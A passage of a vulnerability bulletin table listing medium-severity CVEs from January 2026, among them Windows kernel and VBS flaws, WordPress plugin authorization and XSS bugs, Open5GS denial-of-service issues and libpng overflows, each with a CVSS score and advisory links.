| Microsoft--Windows 11 Version 25H2 | Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20819 | Windows Virtualization-Based Security (VBS) Information Disclosure Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Use of uninitialized resource in Dynamic Root of Trust for Measurement (DRTM) allows an authorized attacker to disclose information locally. | 2026-01-13 | 4.4 | CVE-2026-20962 | Dynamic Root of Trust for Measurement (DRTM) Information Disclosure Vulnerability |
| Microsoft--Windows Server 2019 | Insertion of sensitive information into log file in Windows Kernel allows an unauthorized attacker to disclose information locally. | 2026-01-13 | 6.2 | CVE-2026-20818 | Windows Kernel Information Disclosure Vulnerability |
| Microsoft--Windows Server 2019 | Use of a broken or risky cryptographic algorithm in Windows Kerberos allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20833 | Windows Kerberos Information Disclosure Vulnerability |
| Microsoft--Windows Server 2022 | Generation of error message containing sensitive information in Windows Kernel allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20838 | Windows Kernel Information Disclosure Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Out-of-bounds read in Capability Access Management Service (camsvc) allows an unauthorized attacker to disclose information locally. | 2026-01-13 | 6.2 | CVE-2026-20851 | Capability Access Management Service (camsvc) Information Disclosure Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Heap-based buffer overflow in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 6.7 | CVE-2026-20876 | Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Out-of-bounds read in Capability Access Management Service (camsvc) allows an authorized attacker to disclose information locally. | 2026-01-13 | 5.5 | CVE-2026-20835 | Capability Access Management Service (camsvc) Information Disclosure Vulnerability |
| monetizemore--Advanced Ads Ad Manager & AdSense | The Advanced Ads - Ad Manager & AdSense plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 2.0.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-17 | 4.9 | CVE-2025-12984 | https://www.wordfence.com/threat-intel/vulnerabilities/id/729e8a06-abaa-4468-8a80-1e5c6cbace92?source=cve https://plugins.trac.wordpress.org/browser/advanced-ads/tags/2.0.13/includes/admin/class-placement-list-table.php#L254 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3429511%40advanced-ads&new=3429511%40advanced-ads&sfp_email=&sfph_mail= |
| mPDF--mPDF | mPDF 7.0 contains a local file inclusion vulnerability that allows attackers to read arbitrary system files by manipulating annotation file parameters. Attackers can generate URL-encoded or base64 payloads to include local files through crafted annotation content with file path specifications. | 2026-01-13 | 6.2 | CVE-2022-50897 | ExploitDB-50995 Official mPDF Project Homepage VulnCheck Advisory: mPDF 7.0 - Local File Inclusion |
| n/a--EyouCMS | A weakness has been identified in EyouCMS up to 1.7.1/5.0. Impacted is the function check_userinfo of the file Diyajax.php of the component Member Avatar Handler. Executing a manipulation of the argument viewfile can lead to unrestricted upload. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-18 | 6.3 | CVE-2026-1107 | VDB-341699 | EyouCMS Member Avatar Diyajax.php check_userinfo unrestricted upload VDB-341699 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731540 | Hainan Zanzan Network Technology Co. Eyoucms <=1.7.1 causing code execution due to file inclusion https://github.com/24-2021/vul3/blob/main/Eyoucms/Eyoucms%3D1.7.1%20check_userinfo%20api%20viewfile%20exists%2C%20causing%20code%20execution%20due%20to%20file%20inclusion.md https://github.com/24-2021/vul3/blob/main/Eyoucms/Eyoucms%3D1.7.1%20check_userinfo%20api%20viewfile%20exists%2C%20causing%20code%20execution%20due%20to%20file%20inclusion.md#poc |
| n/a--Mapnik | A security vulnerability has been detected in Mapnik up to 4.2.0. This issue affects the function mapnik::dbf_file::string_value of the file plugins/input/shape/dbfile.cpp. Such manipulation leads to heap-based buffer overflow. The attack must be carried out locally. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-18 | 5.3 | CVE-2025-15537 | VDB-341709 | Mapnik dbfile.cpp string_value heap-based overflow VDB-341709 | CTI Indicators (IOB, IOC, IOA) Submit #733348 | mapnik Mapnik v4.2.0 and master-branch Heap-based Buffer Overflow https://github.com/mapnik/mapnik/issues/4543 https://github.com/oneafter/1218/blob/main/repro |
| n/a--net.sourceforge.plantuml:plantuml | Versions of the package net.sourceforge.plantuml:plantuml before 1.2026.0 are vulnerable to Stored XSS due to insufficient sanitization of interactive attributes in GraphViz diagrams. As a result, a crafted PlantUML diagram can inject malicious JavaScript into generated SVG output, leading to arbitrary script execution in the context of applications that render the SVG. | 2026-01-16 | 6.1 | CVE-2026-0858 | https://security.snyk.io/vuln/SNYK-JAVA-NETSOURCEFORGEPLANTUML-14552230 https://github.com/plantuml/plantuml/commit/6826315db092d2e432aeab1a0894e08017c6e4bd https://github.com/plantuml/plantuml/releases/tag/v1.2026.0 |
| n/a--Open5GS | A vulnerability has been found in Open5GS up to 2.7.6. Affected by this vulnerability is an unknown functionality of the component GTPv2 Bearer Response Handler. Such manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 98f76e98df35cd6a35e868aa62715db7f8141ac1. A patch should be applied to remediate this issue. | 2026-01-16 | 5.3 | CVE-2025-15528 | VDB-341595 | Open5GS GTPv2 Bearer Response denial of service VDB-341595 | CTI Indicators (IOB, IOC, TTP) Submit #728128 | Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4225 https://github.com/open5gs/open5gs/issues/4225#issue-3769531006 https://github.com/open5gs/open5gs/commit/98f76e98df35cd6a35e868aa62715db7f8141ac1 |
| n/a--Open5GS | A vulnerability was found in Open5GS up to 2.7.6. Affected by this issue is the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c. Performing a manipulation results in denial of service. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The patch is named b19cf6a2dbf5d30811be4488bf059c865bd7d1d2. To fix this issue, it is recommended to deploy a patch. | 2026-01-16 | 5.3 | CVE-2025-15529 | VDB-341596 | Open5GS s5c-handler.c sgwc_s5c_handle_create_session_response denial of service VDB-341596 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728130 | Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4226 https://github.com/open5gs/open5gs/issues/4226#issue-3769595366 https://github.com/open5gs/open5gs/commit/b19cf6a2dbf5d30811be4488bf059c865bd7d1d2 |
| n/a--Open5GS | A vulnerability was determined in Open5GS up to 2.7.6. This affects the function sgwc_s11_handle_create_indirect_data_forwarding_tunnel_request of the file /src/sgwc/s11-handler.c. Executing a manipulation can lead to reachable assertion. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The issue report is flagged as already-fixed. | 2026-01-17 | 5.3 | CVE-2025-15530 | VDB-341597 | Open5GS s11-handler.c assertion VDB-341597 | CTI Indicators (IOB, IOC, IOA) Submit #728987 | Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4231 https://github.com/open5gs/open5gs/issues/4231#issue-3774187007 |
| n/a--Open5GS | A vulnerability was identified in Open5GS up to 2.7.5. This vulnerability affects the function sgwc_bearer_add of the file src/sgwc/context.c. The manipulation leads to reachable assertion. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The issue report is flagged as already-fixed. | 2026-01-17 | 5.3 | CVE-2025-15531 | VDB-341598 | Open5GS context.c sgwc_bearer_add assertion VDB-341598 | CTI Indicators (IOB, IOC, IOA) Submit #729339 | Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4233 https://github.com/open5gs/open5gs/issues/4233#issue-3776216182 |
| n/a--Open5GS | A security flaw has been discovered in Open5GS up to 2.7.5. This issue affects some unknown processing of the component Timer Handler. The manipulation results in resource consumption. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The patch is identified as c7c131f8d2cb1195ada5e0e691b6868ebcd8a845. It is best practice to apply a patch to resolve this issue. | 2026-01-17 | 5.3 | CVE-2025-15532 | VDB-341599 | Open5GS Timer resource consumption VDB-341599 | CTI Indicators (IOB, IOC, TTP) Submit #729354 | Open5GS SGWC v2.7.6 Denial of Service Submit #729357 | Open5GS SGWC v2.7.6 Denial of Service (Duplicate) https://github.com/open5gs/open5gs/issues/4220 https://github.com/open5gs/open5gs/issues/4221 https://github.com/open5gs/open5gs/issues/4220#issue-3766066853 https://github.com/open5gs/open5gs/commit/c7c131f8d2cb1195ada5e0e691b6868ebcd8a845 |
| n/a--Open5GS | A vulnerability was determined in Open5GS up to 2.7.6. Impacted is the function sgwc_s11_handle_downlink_data_notification_ack of the file src/sgwc/s11-handler.c of the component sgwc. This manipulation causes denial of service. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. Patch name: b4707272c1caf6a7d4dca905694ea55557a0545f. To fix this issue, it is recommended to deploy a patch. The issue report is flagged as already-fixed. | 2026-01-18 | 5.3 | CVE-2025-15539 | VDB-341732 | Open5GS sgwc s11-handler.c sgwc_s11_handle_downlink_data_notification_ack denial of service VDB-341732 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735339 | Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4230 https://github.com/open5gs/open5gs/issues/4230#issue-3774173079 https://github.com/open5gs/open5gs/commit/b4707272c1caf6a7d4dca905694ea55557a0545f |
| n8n-io--n8n | n8n is an open source workflow automation platform. From 1.36.0 to before 2.2.0, the Webhook node's IP whitelist validation performed partial string matching instead of exact IP comparison. As a result, an incoming request could be accepted if the source IP address merely contained the configured whitelist entry as a substring. This issue affected instances where workflow editors relied on IP-based access controls to restrict webhook access. Both IPv4 and IPv6 addresses were impacted. An attacker with a non-whitelisted IP could bypass restrictions if their IP shared a partial prefix with a trusted address, undermining the intended security boundary. This vulnerability is fixed in 2.2.0. | 2026-01-13 | 5.3 | CVE-2025-68949 | https://github.com/n8n-io/n8n/security/advisories/GHSA-w96v-gf22-crwp https://github.com/n8n-io/n8n/issues/23399 https://github.com/n8n-io/n8n/pull/23399 https://github.com/n8n-io/n8n/commit/11f8597d4ad69ea3b58941573997fdbc4de1fec5 |
| naa986--Payment Button for PayPal | The Payment Button for PayPal plugin for WordPress is vulnerable to unauthorized order creation in all versions up to, and including, 1.2.3.41. This is due to the plugin exposing a public AJAX endpoint (`wppaypalcheckout_ajax_process_order`) that processes checkout results without any authentication or server-side verification of the PayPal transaction. This makes it possible for unauthenticated attackers to create arbitrary orders on the site with any chosen transaction ID, payment status, product name, amount, or customer information via direct POST requests to the AJAX endpoint, granted they can bypass basic parameter validation. If email sending is enabled, the plugin will also trigger purchase receipt emails to any email address supplied in the request, leading to order database corruption and unauthorized outgoing emails without any real PayPal transaction taking place. | 2026-01-17 | 5.3 | CVE-2025-14463 | https://www.wordfence.com/threat-intel/vulnerabilities/id/814e50de-3690-4adf-bc01-a63cd71bd1cf?source=cve https://plugins.trac.wordpress.org/browser/wp-paypal/trunk/wp-paypal.php#L70 https://plugins.trac.wordpress.org/browser/wp-paypal/tags/1.2.3.41/wp-paypal.php#L70 https://plugins.trac.wordpress.org/browser/wp-paypal/trunk/wp-paypal-checkout.php#L249 https://plugins.trac.wordpress.org/browser/wp-paypal/tags/1.2.3.41/wp-paypal-checkout.php#L249 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3431974%40wp-paypal&new=3431974%40wp-paypal&sfp_email=&sfph_mail= |
| netcashpaynow--Netcash WooCommerce Payment Gateway | The Netcash WooCommerce Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handle_return_url function in all versions up to, and including, 4.1.3. This makes it possible for unauthenticated attackers to mark any WooCommerce order as processing/completed. | 2026-01-14 | 5.3 | CVE-2025-14880 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6ca11df6-83e3-48b5-84b8-3f3e4f75ac4a?source=cve https://plugins.trac.wordpress.org/browser/netcash-pay-now-payment-gateway-for-woocommerce/tags/4.1.3/includes/class-wc-gateway-paynow.php#L1127 |
| ninjateam--WP Duplicate Page | The WP Duplicate Page plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the 'duplicateBulkHandle' and 'duplicateBulkHandleHPOS' functions in all versions up to, and including, 1.8. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate arbitrary posts, pages, and WooCommerce HPOS orders even when their role is explicitly excluded from the plugin's "Allowed User Roles" setting, potentially exposing sensitive information and allowing duplicate fulfillment of WooCommerce orders. | 2026-01-13 | 5.4 | CVE-2025-14001 | https://www.wordfence.com/threat-intel/vulnerabilities/id/60830ed8-3ab8-44e8-899c-7032a187da8b?source=cve https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.8/includes/Classes/ButtonDuplicate.php#L54 https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.8/includes/Classes/ButtonDuplicate.php#L79 https://plugins.trac.wordpress.org/changeset/3432233/ |
| nofearinc--WP-CRM System Manage Clients and Projects | The WP-CRM System plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on the wpcrm_get_email_recipients and wpcrm_system_ajax_task_change_status AJAX functions in all versions up to, and including, 3.4.5. This makes it possible for authenticated attackers, with subscriber level access and above, to enumerate CRM contact email addresses (PII disclosure) and modify CRM task statuses. | 2026-01-14 | 5.4 | CVE-2025-14854 | https://www.wordfence.com/threat-intel/vulnerabilities/id/da607df4-1dbb-4b1e-ace6-b339cf9e8512?source=cve https://plugins.trac.wordpress.org/browser/wp-crm-system/tags/3.4.5/includes/wcs-functions.php?marks=942-975#L942 https://plugins.trac.wordpress.org/browser/wp-crm-system/tags/3.4.5/includes/wcs-dashboard-task-list.php?marks=177-190#L177 |
| NSecsoft--NSecKrnl | NSecsoft 'NSecKrnl' is a Windows driver that allows a local, authenticated attacker to terminate processes owned by other users, including SYSTEM and Protected Processes by issuing crafted IOCTL requests to the driver. | 2026-01-13 | 4.7 | CVE-2025-68947 | url url url url url |
| obridgeacademy--WPBlogSyn | The WPBlogSyn plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to update the plugin's remote sync settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-14 | 4.3 | CVE-2025-14389 | https://www.wordfence.com/threat-intel/vulnerabilities/id/141137a4-609f-4ea9-beba-d37b48144c29?source=cve https://plugins.trac.wordpress.org/browser/wpblogsync/tags/1.0/blogsync.php#L14 |
| Open Asset Import Library--Assimp | A security vulnerability has been detected in Open Asset Import Library Assimp up to 6.0.2. Affected by this vulnerability is the function Assimp::LWOImporter::FindUVChannels of the file /src/assimp/code/AssetLib/LWO/LWOMaterial.cpp. Such manipulation leads to use after free. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. This and similar defects are tracked and handled via issue #6128. | 2026-01-18 | 5.3 | CVE-2025-15538 | VDB-341727 | Open Asset Import Library Assimp LWOMaterial.cpp FindUVChannels use after free VDB-341727 | CTI Indicators (IOB, IOC, IOA) Submit #735232 | Open Asset Import Library Assimp 6.0.2 Use After Free https://github.com/assimp/assimp/issues/6258 https://github.com/assimp/assimp/issues/6258#issuecomment-3070999530 https://github.com/user-attachments/files/21216542/assimp_poc10.zip |
| opencryptoki--opencryptoki | openCryptoki is a PKCS#11 library and tools for Linux and AIX. In 3.25.0 and 3.26.0, there is a heap buffer overflow vulnerability in the CKM_ECDH_AES_KEY_WRAP implementation allows an attacker with local access to cause out-of-bounds writes in the host process by supplying a compressed EC public key and invoking C_WrapKey. This can lead to heap corruption, or denial-of-service. | 2026-01-13 | 6.6 | CVE-2026-22791 | https://github.com/opencryptoki/opencryptoki/security/advisories/GHSA-26f5-3mwq-4wm7 https://github.com/opencryptoki/opencryptoki/commit/785d7577e1477d12fbe235554e7e7b24f2de34b7 https://github.com/opencryptoki/opencryptoki/commit/e37e9127deeeb7bf3c3c4d852c594256c57ec3a8 |
| OpenSC project--pam_pkcs11 | In OpenSC pam_pkcs11 before 0.6.13, pam_sm_authenticate() wrongly returns PAM_IGNORE in many error situations (such as an error triggered by a smartcard before login), allowing authentication bypass. | 2026-01-16 | 6.7 | CVE-2025-24531 | https://github.com/OpenSC/pam_pkcs11/security/advisories/GHSA-7mf6-rg36-qgch https://github.com/OpenSC/pam_pkcs11/releases https://www.openwall.com/lists/oss-security/2025/02/06/3 |
| opensourcepos--opensourcepos | Open Source Point of Sale (opensourcepos) is a web based point of sale application written in PHP using CodeIgniter framework. opensourcepos 3.4.0 and 3.4.1 has a stored XSS vulnerability exists in the Configuration (Information) functionality. An authenticated user with the permission "Configuration: Change OSPOS's Configuration" can inject a malicious JavaScript payload into the Company Name field when updating Information in Configuration. The malicious payload is stored and later triggered when a user accesses /sales/complete. First select Sales, and choose New Item to create an item, then click on Completed . Due to insufficient input validation and output encoding, the payload is rendered and executed in the user's browser, resulting in a stored XSS vulnerability. This vulnerability is fixed in 3.4.2. | 2026-01-13 | 4.3 | CVE-2025-68658 | https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-32r8-8r9r-9chw https://github.com/opensourcepos/opensourcepos/commit/849439c71eaa4c15857fb7c603297261c2ddc26d |
| paultgoodchild--Shield: Blocks Bots, Protects Users, and Prevents Security Breaches | The Shield: Blocks Bots, Protects Users, and Prevents Security Breaches plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 21.0.9 via the MfaGoogleAuthToggle class due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disable Google Authenticator for any user. | 2026-01-16 | 4.3 | CVE-2025-15370 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d777014a-5397-4062-af39-7ea86589a0d0?source=cve https://plugins.trac.wordpress.org/browser/wp-simple-firewall/tags/21.0.8/src/lib/src/ActionRouter/Actions/MfaGoogleAuthToggle.php https://plugins.trac.wordpress.org/changeset/3438647/wp-simple-firewall |
| payhere--PayHere Payment Gateway Plugin for WooCommerce | The PayHere Payment Gateway Plugin for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to an improper validation logic in the check_payhere_response function in all versions up to, and including, 2.3.9. This makes it possible for unauthenticated attackers to change the status of pending WooCommerce orders to paid/completed/on hold. | 2026-01-14 | 5.3 | CVE-2025-15475 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e0c92241-0bef-4f87-8478-4d805435f09d?source=cve https://plugins.trac.wordpress.org/browser/payhere-payment-gateway/tags/2.3.9/gateway/class-wcgatewaypayhere.php#L709 |
| perfitdev--Perfit WooCommerce | The Perfit WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.0.1. This is due to missing authorization checks on the `logout` function called via the `actions` function hooked to `admin_init`. This makes it possible for unauthenticated attackers to delete arbitrary plugin settings via the `action` parameter. | 2026-01-14 | 5.3 | CVE-2025-14173 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cb141b46-2585-4b58-8d91-0cdb275348a1?source=cve https://plugins.trac.wordpress.org/browser/perfit-woocommerce/trunk/includes/class-wcp-settings-tab.php#L102 https://plugins.trac.wordpress.org/browser/perfit-woocommerce/tags/1.0.1/includes/class-wcp-settings-tab.php#L102 |
| Phpwcms--Phpwcms | Phpwcms 1.9.30 contains a file upload vulnerability that allows authenticated attackers to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG payloads through the multiple file upload feature to potentially execute cross-site scripting attacks on the platform. | 2026-01-15 | 5.4 | CVE-2021-47783 | ExploitDB-50363 Official Product Homepage VulnCheck Advisory: Phpwcms 1.9.30 - Arbitrary File Upload |
| pimcore--pimcore | Pimcore Web2Print Tools Bundle adds tools for web-to-print use cases to Pimcore. Prior to 5.2.2 and 6.1.1, the application fails to enforce proper server-side authorization checks on the API endpoint responsible for managing "Favourite Output Channel Configurations." Testing revealed that an authenticated backend user without explicitely lacking permissions for this feature was still able to successfully invoke the endpoint and modify or retrieve these configurations. This vulnerability is fixed in 5.2.2 and 6.1.1. | 2026-01-15 | 5.4 | CVE-2026-23496 | https://github.com/pimcore/pimcore/security/advisories/GHSA-4wg4-p27p-5q2r https://github.com/pimcore/web2print-tools/pull/108 https://github.com/pimcore/web2print-tools/commit/7714452a04b9f9b077752784af4b8d0b05e464a1 https://github.com/pimcore/web2print-tools/releases/tag/v5.2.2 https://github.com/pimcore/web2print-tools/releases/tag/v6.1.1 |
| pimcore--pimcore | Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, the application fails to enforce proper server-side authorization checks on the API endpoint responsible for reading or listing static routes. In Pimcore, static routes are custom URL patterns defined via the backend interface or the var/config/staticroutes.php file, including details like regex-based patterns, controllers, variables, and priorities. These routes are registered automatically through the PimcoreStaticRoutesBundle and integrated into the MVC routing system. Testing revealed that an authenticated backend user lacking explicit permissions was able to invoke the endpoint (e.g., GET /api/static-routes) and retrieve sensitive route configurations. This vulnerability is fixed in 12.3.1 and 11.5.14. | 2026-01-15 | 4.3 | CVE-2026-23494 | https://github.com/pimcore/pimcore/security/advisories/GHSA-m3r2-724c-pwgf https://github.com/pimcore/pimcore/pull/18893 https://github.com/pimcore/pimcore/releases/tag/v11.5.14 https://github.com/pimcore/pimcore/releases/tag/v12.3.1 |
| pimcore--pimcore | Pimcore's Admin Classic Bundle provides a Backend UI for Pimcore. Prior to 2.2.3 and 1.7.16, the API endpoint for listing Predefined Properties in the Pimcore platform lacks adequate server-side authorization checks. Predefined Properties are configurable metadata definitions (e.g., name, key, type, default value) used across documents, assets, and objects to standardize custom attributes and improve editorial workflows, as documented in Pimcore's official properties guide. Testing confirmed that an authenticated backend user without explicit permissions for property management could successfully call the endpoint and retrieve the complete list of these configurations. The vulnerability is fixed in 2.2.3 and 1.7.16. | 2026-01-15 | 4.3 | CVE-2026-23495 | https://github.com/pimcore/pimcore/security/advisories/GHSA-hqrp-m84v-2m2f https://github.com/pimcore/admin-ui-classic-bundle/commit/98095949fbeaf11cdf4cadb2989d7454e1b88909 https://github.com/pimcore/admin-ui-classic-bundle/releases/tag/v1.7.16 https://github.com/pimcore/admin-ui-classic-bundle/releases/tag/v2.2.3 |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.51 to 1.6.53, there is a heap buffer over-read in the libpng simplified API function png_image_finish_read when processing interlaced 16-bit PNGs with 8-bit output format and non-minimal row stride. This is a regression introduced by the fix for CVE-2025-65018. This vulnerability is fixed in 1.6.54. | 2026-01-12 | 6.1 | CVE-2026-22695 | https://github.com/pnggroup/libpng/security/advisories/GHSA-mmq5-27w3-rxpp https://github.com/pnggroup/libpng/issues/778 https://github.com/pnggroup/libpng/commit/218612ddd6b17944e21eda56caf8b4bf7779d1ea https://github.com/pnggroup/libpng/commit/e4f7ad4ea2 |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.26 to 1.6.53, there is an integer truncation in the libpng simplified write API functions png_write_image_16bit and png_write_image_8bit causes heap buffer over-read when the caller provides a negative row stride (for bottom-up image layouts) or a stride exceeding 65535 bytes. The bug was introduced in libpng 1.6.26 (October 2016) by casts added to silence compiler warnings on 16-bit systems. This vulnerability is fixed in 1.6.54. | 2026-01-12 | 6.8 | CVE-2026-22801 | https://github.com/pnggroup/libpng/security/advisories/GHSA-vgjq-8cw5-ggw8 |
| prasannasp--Short Link | The Short Link plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'short_link_post_title' and 'short_link_page_title' parameters in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the injected page. | 2026-01-14 | 4.4 | CVE-2026-0813 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8623d2cc-dcdd-4453-9a86-669bdd44eae1?source=cve https://plugins.trac.wordpress.org/browser/short-link/tags/1.0/short-link.php#L118 https://plugins.trac.wordpress.org/browser/short-link/trunk/short-link.php#L118 |
| radykal--Fancy Product Designer | The Fancy Product Designer plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 6.4.8. This is due to improper error handling in the PDF upload functionality that exposes server filesystem paths and stack traces in error messages. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website. | 2026-01-16 | 5.3 | CVE-2025-15526 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9b39b4ce-3885-4ea4-8cf0-84e66e7f6a12?source=cve https://support.fancyproductdesigner.com/support/discussions/topics/13000036024 |
| raysan5--raylib | A vulnerability was determined in raysan5 raylib up to 909f040. Affected by this vulnerability is the function GenImageFontAtlas of the file src/rtext.c. Executing a manipulation can lead to heap-based buffer overflow. The attack can only be executed locally. The exploit has been publicly disclosed and may be utilized. This patch is called 5a3391fdce046bc5473e52afbd835dd2dc127146. Applying a patch is advised to resolve this issue. | 2026-01-18 | 5.3 | CVE-2025-15533 | VDB-341705 | raysan5 raylib rtext.c GenImageFontAtlas heap-based overflow VDB-341705 | CTI Indicators (IOB, IOC, IOA) Submit #733341 | raysan5 raylib 909f040 Heap-based Buffer Overflow Submit #733342 | raysan5 raylib 909f040 Heap-based Buffer Overflow (Duplicate) https://github.com/raysan5/raylib/issues/5433 https://github.com/raysan5/raylib/pull/5450 https://github.com/oneafter/1224/blob/main/hbf2 https://github.com/raysan5/raylib/commit/5a3391fdce046bc5473e52afbd835dd2dc127146 |
| raysan5--raylib | A vulnerability was identified in raysan5 raylib up to 909f040. Affected by this issue is the function LoadFontData of the file src/rtext.c. The manipulation leads to integer overflow. The attack can only be performed from a local environment. The exploit is publicly available and might be used. The identifier of the patch is 5a3391fdce046bc5473e52afbd835dd2dc127146. It is suggested to install a patch to address this issue. | 2026-01-18 | 5.3 | CVE-2025-15534 | VDB-341706 | raysan5 raylib rtext.c LoadFontData integer overflow VDB-341706 | CTI Indicators (IOB, IOC, IOA) Submit #733343 | raysan5 raylib 909f040 Integer Overflow https://github.com/raysan5/raylib/issues/5436 https://github.com/raysan5/raylib/pull/5450 https://github.com/oneafter/1224/blob/main/segv1 https://github.com/raysan5/raylib/commit/5a3391fdce046bc5473e52afbd835dd2dc127146 |
| rebelcode--RSS Aggregator RSS Import, News Feeds, Feed to Post, and Autoblogging | The RSS Aggregator - RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'className' parameter in all versions up to, and including, 5.0.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-16 | 6.1 | CVE-2025-14375 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3d2dde13-2940-478e-8e2b-baf60003754a?source=cve https://plugins.trac.wordpress.org/changeset/3439384/wp-rss-aggregator |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in vsftpd. This vulnerability allows a denial of service (DoS) via an integer overflow in the ls command parameter parsing, triggered by a remote, authenticated attacker sending a crafted STAT command with a specific byte sequence. | 2026-01-14 | 6.5 | CVE-2025-14242 | RHSA-2026:0605 RHSA-2026:0606 RHSA-2026:0608 https://access.redhat.com/security/cve/CVE-2025-14242 RHBZ#2419826 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libxml2, an XML parsing library. This uncontrolled recursion vulnerability occurs in the xmlCatalogXMLResolveURI function when an XML catalog contains a delegate URI entry that references itself. A remote attacker could exploit this configuration-dependent issue by providing a specially crafted XML catalog, leading to infinite recursion and call stack exhaustion. This ultimately results in a segmentation fault, causing a Denial of Service (DoS) by crashing affected applications. | 2026-01-15 | 5.9 | CVE-2026-0990 | https://access.redhat.com/security/cve/CVE-2026-0990 RHBZ#2429959 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libsoup's WebSocket frame processing when handling incoming messages. If a non-default configuration is used where the maximum incoming payload size is unset, the library may read memory outside the intended bounds. This can cause unintended memory exposure or a crash. Applications using libsoup's WebSocket support with this configuration may be impacted. | 2026-01-13 | 4.8 | CVE-2026-0716 | https://access.redhat.com/security/cve/CVE-2026-0716 RHBZ#2427896 https://gitlab.gnome.org/GNOME/libsoup/-/issues/476 |
| rndsand81--Stopwords for comments | The Stopwords for comments plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing nonce validation on the 'set_stopwords_for_comments' and 'delete_stopwords_for_comments' functions. This makes it possible for unauthenticated attackers to add or delete stopwords via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-14 | 4.3 | CVE-2025-15376 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dd8c45c7-dbb2-46ab-8e50-e02062587b00?source=cve https://plugins.trac.wordpress.org/browser/stopwords-for-comments/trunk/functions.php?marks=151,170#L151 |
